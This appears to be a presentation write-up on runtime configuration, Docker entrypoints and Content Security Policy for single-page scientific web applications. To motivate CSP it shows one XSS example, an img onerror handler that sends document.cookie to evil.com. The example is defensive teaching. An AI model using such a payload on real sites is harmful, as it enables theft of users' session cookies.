

Leveraging Single-Page Applications for Seamless Scientific Workflows: DevSecOps Considerations

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Wishlist

- We want to be able to deploy the entire system **on another server** at a moment's notice
- In production, backend API URLs, base URLs, and other variables should be **configured at runtime**
- In a development environment, developers should be able to **easily tweak these parameters**
- We want to take advantage of the simplicity and performance of **static web servers**
- Some security measures are best configured at runtime

Frontend Setup

- Global Window (**window.config**) object stores runtime configuration state
- window.config defined from separate **config.js** file (production) or from a development-specific conditional block early in the code (development)

```
declare global {
  interface Window {
    config: ConfigKeys;
  }
}

export interface ConfigKeys {
  baseUrl: string;
  apiUrl: string;
  apiBaseUrl: string;
}
```

```
import './styles/globalStyles.css';

import { render } from 'solid-js/web';

import App from './App';

if (import.meta.env.DEV) {
  window.config = {
    baseUrl: import.meta.env['VITE_BASE_URL'] as string,
    apiUrl: import.meta.env['VITE_API_URL'] as string,
    apiBaseUrl: import.meta.env['VITE_API_B_URL'] as string,
  };
}

render(() => <App />, document.getElementById('root') as HTMLElement);
```

Content Security Policy

```
<img src="" onerror="window.location = 'https://evil.com?cookie=${document.cookie}'" />
```

- Critical tool for preventing cross-site scripting (XSS) attacks
- Should be defined server-side for maximum utility (i.e “frame-ancestors” directive, “report-to” directive”)
- Also allows for whitelisting acceptable resource locations
- URLs used in frontend configuration can also be reused here, particularly for “connect-src” directives

```
add_header Content-Security-Policy "default-src 'none'; frame-ancestors 'none'; base-uri 'none'; form-action 'none'; style-src 'self'; script-src 'self'; connect-src 'self' {{API_URL}} {{API_B_URL}}; img-src 'self'"  
always;
```

Docker setup from base web server image

- Add application build files
- Add custom web server configuration
- Add entrypoint script, which:
 - Writes config.js file to the web server's HTML root from environment variables
 - Modifies web server Content-Security-Policy configuration file based off of environment variables from template, handles relative/absolute paths automatically
 - Modifies index.html file to replace absolute URL path with a Base URL path
 - Should automatically handle common configuration annoyances (i.e. trailing URL slashes, escaping appropriate characters)

```
# $1 = template target, $2 = value replacement
edit_security_conf() {
  case $2 in
    /*)
      # absolute path, so don't need to add anything to CSP (just remove the hook)
      sed -i "s~[[:space:]]*${$1}~~g" $SECURITY_CONF_FILE
      ;;
    *)
      # need to add the URL to CSP (if it doesn't start with "/", assume it's a domain or IP)
      # IMPORTANT: if the URL variable has a path after its domain,
      # you must make sure a trailing slash exists, or you will get CSP errors!
      sed -i "s~${$1}~${2%/}/~g" $SECURITY_CONF_FILE
      ;;
  esac
}
```

Advantages

- Full configuration involves editing a few environment variables
- Allows for rapid deployment on numerous systems
- Removes some common deployment configuration mistakes
- Allows for easy environment configuration for frontend developers
- Minimizes boilerplate in frontend code
- Easier to set aggressive caching policy, allowing for more performant application on revisits
- Also applicable for static-site generated websites
- Approach can be slightly tweaked for AWS-S3-style deployments

Disadvantages

- Adding/removing a new URL involves a lot of boilerplate
- Requires knowledge of shell scripting
- Nonce-based CSPs will not be effective

Example application

<https://github.com/smart-spectral-matching/ssm-ui-catalog/>